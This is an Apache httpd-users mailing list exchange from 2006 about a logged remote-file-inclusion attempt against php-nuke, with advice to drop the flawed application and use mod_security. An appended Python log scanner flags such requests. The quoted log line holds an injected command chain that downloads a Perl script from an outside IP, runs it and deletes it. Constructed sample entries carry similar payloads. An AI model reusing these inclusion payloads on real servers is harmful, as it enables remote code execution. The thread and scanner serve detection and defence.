httpd-users mailing list archives

From "David Velayos" <dvela...@gmail.com>
Subject Re: [users@httpd] Question: Apache 1.3 and SetEnvIf /RedirectMatch
Date Tue, 08 Aug 2006 12:59:08 GMT
Of course, this is not working (you have to be authenticated to use this
page as an admin user), but it's a useless waste of bandwidth and I think
it's better to deny the access by a common security mechanism before. The
question is that

So, with mod_security can I block suspicious URLs with regexp?

2006/8/8, Joshua Slive <joshua@slive.ca>:
>
> On 8/7/06, david <dvelayos@gmail.com> wrote:
> > Hello!
> >
> > Recently, I've found some entries in my Apache web server log like this:
> >
> > [IP] - - [05/Aug/2006:02:17:47 +0200] "GET
> > /nuke/index.php?config=1&base_datapath=
> http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20
> >%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*?
> > HTTP/1.0" 200 220151 "-" "Mozilla/5.0"
> >
> > As you can see, some attacker tries to use the index.php file to get a
> > cmd.txt file from another site.
> >
> > Is there any way to detect these URLs and stop this by configuring Apache?
>
> If this is actually working on your server, you need to immediately
> get rid of the application that is allowing it (php-nuke it seems),
> since it has a major security flaw.
>
> In general, mod_security can be used to block suspicious URLs.  But it
> is not a substitute for making sure you only use secure web
> applications.
>
> Joshua.
>
>
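
An added example, not part of the thread and not mod_security configuration: a Python check over access-log lines that flags query parameters whose decoded value is a remote URL, the pattern visible in the log entry quoted above. The function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request line, status and size as they appear in Apache common/combined logs.
LOG_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) '
    r'HTTP/\d\.\d" (?P<status>\d{3}) (?P<size>\S+)'
)
# A decoded parameter value that starts with a URL scheme: the shape of the
# base_datapath=http://... parameter in the log entry quoted in the thread.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def remote_url_params(target):
    """Return names of query parameters whose decoded value is a remote URL."""
    query = target.partition('?')[2]
    hits = []
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        if REMOTE_URL_RE.match(unquote_plus(value)):
            hits.append(unquote_plus(name))
    return hits


def scan(lines):
    """Yield (client, status, path, params) for each suspicious request."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log entry
        params = remote_url_params(m['target'])
        if params:
            # The status is kept for triage: a 200 only means a page was served
            # (for example a login form), not that the inclusion was executed.
            yield m['client'], int(m['status']), m['target'].partition('?')[0], params


# Constructed sample entries (documentation addresses, not taken from a real log).
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Aug/2006:02:17:47 +0200] "GET /nuke/index.php?config=1'
    '&base_datapath=http://203.0.113.9/cmd.txt?&cmd=id HTTP/1.0" 200 220151 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [05/Aug/2006:02:18:01 +0200] "GET /index.php?page=news&id=4 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [05/Aug/2006:02:19:30 +0200] "GET /index.php?inc=HTTP%3A%2F%2F203.0.113.9%2Fx.txt HTTP/1.1" 403 210',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Values are percent-decoded once before matching, so an encoded scheme such as `HTTP%3A%2F%2F` is still flagged.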
